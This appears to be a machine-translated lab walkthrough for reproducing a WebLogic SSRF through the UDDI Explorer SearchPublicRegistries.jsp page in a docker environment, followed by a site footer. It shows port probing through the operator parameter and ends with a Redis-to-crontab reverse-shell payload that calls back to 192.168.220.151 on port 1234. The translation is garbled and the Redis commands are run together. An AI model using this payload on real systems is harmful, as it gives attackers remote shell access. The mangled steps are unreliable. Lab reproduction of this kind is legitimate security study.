First, use docker to build an environment docker installation and build an environment tutorial: https://www.freebuf.com/sectool/252257.html
Access port 7001
Second, the vulnerability reappearance step 1. Vulnerability page/UDDI Explorer/SearchPublicRegistries.jsp
2. Check out IBM and see
It is found to be a connection, so there may be ssrf.
3. Grab the bag with burp suite and click Search
4. Modify the connection of the operator parameter
5. The access result visits a nonexistent port and returns could not connect over HTTP.
Access to an existing port returns a status code.
Access intranet
Rebound shell's payloadset 1 "with redis. * * * * * root bash -i >& /dev/tcp/192.168.220.151/1234 0>&1 "config set dir /etc/config set dbfilename crontabsave
Copyright Description:No reproduction without permission。
Knowledge sharing community for developers。
Let more developers benefit from it。
Help developers share knowledge through the Internet。
Follow us
2023-12-04